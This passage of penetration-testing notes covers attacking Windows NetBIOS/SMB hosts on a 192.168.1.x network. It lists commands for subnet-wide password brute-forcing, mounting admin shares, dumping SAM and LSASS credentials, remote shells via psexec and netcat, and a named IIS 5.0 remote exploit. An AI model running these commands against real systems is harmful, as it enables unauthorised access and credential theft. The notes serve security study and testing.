3. Using the NetBIOS tool with LOOP
FOR /L %i IN (1,1,254) DO nat –u userlist.txt –p passlist.txt 192.168.1.%i > out.txt


Connect through valid user:
Smbclient to enumerate more info.
net use \\192.168.1.152\C$ * /user:scadmin (Will prompt for a password)
net use \\192.168.1.152\C$ ronald3211 /user:scadmin
at \\192.168.1.152 00:04 c:\Windows\system32\cmd.exe

Modify and accessing registry keys using
Regdmp.exe
Regini.exe
Reg.exe

Accessing the SAM Database and LSASS

Pwdump5
Lsadump2



CIFS Service running on TCP and UDP port 445

SMB-AT to enumerate user and system info.
Smbserverscan to scan for smb related ports.
Smbgetserverinfo to get server info.
smbNAT to provide more details about the server info.

Smbdumpusers to enumerate port 139 and 445.
Smbdumpusers –i 192.168.1.152 –m 2 –P1

Smbbf to brute-force password grinding attacks against both NetBIOS and CIFS services.
Smbbf –i 192.168.1.152 –p wordlist.txt –u users.txt –v –P1

Need to have admin user name and password.
Samrdump to list all username in server
Rpcdump to list all endpoint bindings

Registry path for null session: HKLM\SYSTEM\CurrentControlSet\Control\Lsa
Restrictanonymous =0, 1, 2

Use pwdump5 to capture SAM file.
Use netcat to open a shell on remote OS
Use psexec through port 139 or 445 to execute command
Psexec \\192.168.1.152 –u Admin –p password –s cmd.exe


IIS buffer overflow

IIS 5.0 SSL Remote root exploit use thciisslame